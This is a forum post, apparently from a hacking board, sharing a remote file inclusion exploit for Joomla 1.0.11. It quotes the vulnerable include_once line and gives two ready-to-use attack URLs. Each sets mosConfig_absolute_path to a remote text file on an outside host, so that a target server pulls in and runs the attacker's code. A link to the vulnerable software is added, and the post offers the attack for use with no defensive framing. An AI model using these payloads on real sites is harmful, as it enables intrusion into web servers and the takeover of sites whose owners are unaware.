Jump to content
escalation666

Joomla 1.0.11 Remote File Include

Recommended Posts

Posted

Author : Super-Crystal

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==

website: =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--==-=-==-=

Bug'>http://www.joomla.org/

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--==-=-==-=

Bug : include_once ( $mosConfig_absolute_path . '/language/'.

$mosConfig_lang .'.php' );

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--==-=-==-=

Exploit :

www.target.com/script_path/installation/index.php?mosConfig_absolute_path=http://www.arab4services.com/c-h.v2.txt?

------>

www.target.com/script_path/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.arab4services.com/c-h.v2.txt?

Script Download

http://forge.joomla.org/sf/frs/do/downloadFile/projects.joomla/frs.joomla_1_0.1_0_11/frs6654;jsessionid=860E9B227E096AAC4453A3B1FDCE77F5?dl=1

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Thanx : Arab4Services Team http://www.arab4services.com :)

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...